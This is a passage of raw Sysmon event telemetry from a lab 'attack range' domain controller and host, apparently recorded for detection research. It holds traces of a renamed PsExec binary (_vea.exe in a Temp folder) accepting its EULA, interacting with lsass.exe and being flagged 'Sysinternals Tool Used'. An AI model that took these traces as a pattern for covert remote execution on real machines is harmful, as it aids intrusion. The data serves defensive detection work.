Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:20.651{C8EA50B7-170C-6216-1907-000000003802}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000297054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:20.266{C8EA50B7-170B-6216-1807-000000003802}62042828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220957Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:21.718{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE2DDE4D8890D5C127DB3954C79A172F,SHA256=6BBA6FFF1C19854C04D2EC1A42475539AD1299FBFEF88117A0390947DA776991,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:21.734{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7FF9DC511C05A0B6EDEA0BCE9F9AAB6,SHA256=74815FD849F71038C3292E159EE6F5C76D0915CEAEA043FF62FBA500FCB68D74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:21.535{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=8D1EE54C5F1639E39747A933D26C1D82,SHA256=9E2112F231237203015F96D60B9A372BAD0BAA33AC6CC5C50AB84F02E51CEC5A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:21.182{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-170D-6216-1A07-000000003802}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:21.182{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:21.182{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:21.182{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:21.182{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:21.182{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-170D-6216-1A07-000000003802}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:21.182{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-170D-6216-1A07-000000003802}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:21.186{C8EA50B7-170D-6216-1A07-000000003802}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220958Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:22.734{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F3A30FBA83E54156516284B9267CE9F,SHA256=3270F0EB28EE58E6FE360193CF55CEE79B520DBE957A59AFFE38E6D1917F2509,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:22.766{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C90E3273804CC28FB1DA631D7B739B0A,SHA256=811928D8ED54647F461424A1FB327C425353B668520B691F51DD9A56DE6D1B25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:23.766{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B6DF90F5F61FCC4B481AB112A374C40,SHA256=C601FF7FADD43A53ED6808833A61B3A8FD39F47DF74E9EBAA9EFCDD396E24824,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220959Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:23.749{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F98C107987C29781690DABAB4837A4F,SHA256=5323BD1C018E6555AC888FBDA53F30271705EC7A83EC05C290341BC46E65691C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220960Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:24.765{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BB7815D7B7AF506F657A2F1933827CF,SHA256=570BA8D0BCD22F286D3ACD233AE85856F16FFC230A3D7D4F565FFB49D91D4CB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.866{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=649FFD566E61D8BB17880095D4D35DA0,SHA256=C25A52DD634D61B3185304778BE3C531BCDBCCFE5A58E6F89D2EB1043901B0C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.835{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1710-6216-1B07-000000003802}6188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.835{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-1710-6216-1B07-000000003802}6188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000297092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:14:24.817{C8EA50B7-1710-6216-1B07-000000003802}6188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000297091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.735{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1710-6216-1C07-000000003802}6324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.735{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1710-6216-1C07-000000003802}6324C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000297089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:22.624{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49414-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000297088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.716{C8EA50B7-1710-6216-1C07-000000003802}63246096C:\Windows\system32\conhost.exe{C8EA50B7-1710-6216-1B07-000000003802}6188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.666{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1710-6216-1C07-000000003802}6324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.650{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1710-6216-1C07-000000003802}6324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.513{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1710-6216-1B07-000000003802}6188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.497{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.497{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.497{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:24.497{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 